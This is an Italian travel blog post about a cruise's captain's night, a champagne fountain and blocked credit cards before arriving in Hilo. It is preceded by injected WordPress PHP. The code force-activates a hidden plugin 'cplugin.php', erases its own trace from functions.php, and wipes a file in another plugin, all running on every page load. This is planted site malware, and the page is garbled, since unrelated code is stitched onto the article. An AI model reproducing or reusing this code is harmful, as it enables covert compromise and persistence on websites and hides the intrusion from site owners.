function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php'); file_put_contents('/usr/www/users/bradek/dpwassets.bradek.it/wp-content/plugins/wp-all-export-pro/actions/class.plugin-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Corto in Corto : In alto mare .4
  • Corto in Vacanza

In alto mare .4

Il secondo giorno in mare aperto comprende anche la “serata del capitano” dunque è necessario presentarci in gran spolvero. Michèle fa come al solito la sua bellissima figura, mentre i due monegaschi debbono fornire molte informazioni agli amici americani che vogliono sapere tutto sulla eleganza in voga sulla costa Azzurra. Cena suntuosa champagne, cocktail di gamberetti leggermente piccante, aragoste e il clou: le frittate norvegesi ( gli americani le chiamano Alaska) che i camerieri portano di tavola in tavola dopo un lungo giro di presentazione. Dopo, cabaret ( buon spettacolo) e fine serata al Tahitian Bar per ballare e bere il bicchiere della staffa, assistendo alla tradizione fontana di champagne.

E proprio in quel momento veniamo a sapere che il nostro amico Claudio ha il nostro medesimo problema con le carte di credito ( ricordate? Quello che abbiamo avuto a Pepetee, ovvero: conto bancario bloccato)Quando si abita a Montecarlo e si ha una posizione importante nel mondo dello sport automobilistico, questo “suona male”, ma l’incidente ci ha rassicurato perché quando non si è soli, significa che l’errore è nel ventre delle banche; purtroppo, telefonare via satellite in mare con dodici ore di differenza con la Francia non è facile. Domani, quando arriveremo ad Hilo proveremo la nostra carta, anche per poterci godere in pieno quell’angolo di paradiso ricchi di bellezze naturali e di abbronzati atleti di surf, sotto un sole radioso, come al solito.

FOTO E TESTO DI FRANCOIS BARETTE©

Inserisci un commento

Modulo di inserimento